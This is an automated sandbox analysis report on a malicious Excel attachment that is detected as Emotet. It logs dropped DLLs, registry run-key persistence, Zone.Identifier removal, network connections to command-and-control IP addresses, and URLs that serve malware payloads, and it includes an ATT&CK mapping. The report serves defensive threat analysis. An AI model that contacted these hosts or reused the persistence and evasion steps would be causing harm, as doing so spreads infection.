Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx	Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)			Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)			Jump to dropped file

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx			Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\regsvr32.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll			Jump to behavior

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\XEzXl\JZazaZgAOY.dll:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe TID: 6700	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 6880	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

API coverage: 9.8 %

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2415264641.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012793437.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066471204.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415830972.0000000000A34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066669199.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416016572.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_00007FFD2B064980

Source: C:\Windows\System32\regsvr32.exe

8_2_00007FFD2B072AF0

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		8_2_00007FFD2B064980
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B0691F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		8_2_00007FFD2B0691F4

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 45.63.99.23 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 173.255.211.88 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,	8_2_00007FFD2B072BF4
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,	8_2_00007FFD2B077A88
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,	8_2_00007FFD2B0779F8
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,	8_2_00007FFD2B077910
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	8_2_00007FFD2B077F60
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,	8_2_00007FFD2B077FCC
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_00007FFD2B0777EC
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	8_2_00007FFD2B077E88
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	8_2_00007FFD2B077EC8
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,	8_2_00007FFD2B078470
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoW,	8_2_00007FFD2B077D58

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B068C48 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

8_2_00007FFD2B068C48

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B0675D0 HeapCreate,GetVersion,HeapSetInformation,

8_2_00007FFD2B0675D0

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	21 Registry Run Keys / Startup Folder	11 Process Injection	141 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	125 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	26 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO0000001552.xls	66%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.2.regsvr32.exe.980000.0.unpack	100%	Avira	HEUR/AGEN.1215461		Download File

Domains

Source	Detection	Scanner	Link
sbm.xinmoshiwang.com	13%	Virustotal	Browse
datie-tw.com	10%	Virustotal	Browse
copunupo.ac.zm	18%	Virustotal	Browse
ly.yjlianyi.top	13%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F	100%	Avira URL Cloud	malware
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/	0%	Avira URL Cloud	safe
http://ly.yjlianyi.top/wp-admin/4cChao/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/tkafmhcgcid/	0%	Avira URL Cloud	safe
http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/b	0%	Avira URL Cloud	safe
https://my.microsoftpersonalcontent.com	0%	Avira URL Cloud	safe
https://api.scheduler.	0%	Avira URL Cloud	safe
https://45.63.99.23:7080/tkafmhcgcid/8eM	0%	Avira URL Cloud	safe
https://182.162.143.56/tkafmhcgcid/	100%	Avira URL Cloud	malware
https://182.162.143.56/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/2	0%	Avira URL Cloud	safe
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sbm.xinmoshiwang.com	47.92.35.35	true	false	13%, Virustotal, Browse	unknown
datie-tw.com	175.98.167.165	true	false	10%, Virustotal, Browse	unknown
copunupo.ac.zm	41.63.0.22	true	false	18%, Virustotal, Browse	unknown
ly.yjlianyi.top	81.68.152.197	true	false	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ly.yjlianyi.top/wp-admin/4cChao/	false	Avira URL Cloud: malware	unknown
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/	true	Avira URL Cloud: malware	unknown
http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/	true	Avira URL Cloud: malware	unknown
https://182.162.143.56/tkafmhcgcid/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://login.microsoftonline.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://shell.suite.office.com:1443	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://autodiscover-s.outlook.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://roaming.edog.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cdn.entity.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://powerlift.acompli.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cortana.ai	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/imports	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F	regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.aadrm.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.microsoftstream.com/api/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cr.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/	regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.ppe.windows.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://officeci.azurewebsites.net/api/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://45.63.99.23:7080/tkafmhcgcid/	regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.scheduler.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	Avira URL Cloud: safe	unknown
https://my.microsoftpersonalcontent.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://globaldisco.crm.dynamics.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://messaging.engagement.office.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://dev0-api.acompli.net/autodetect	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://web.microsoftstream.com/video/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://45.63.99.23:7080/b	regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.windows.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://dataservice.o365filtering.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
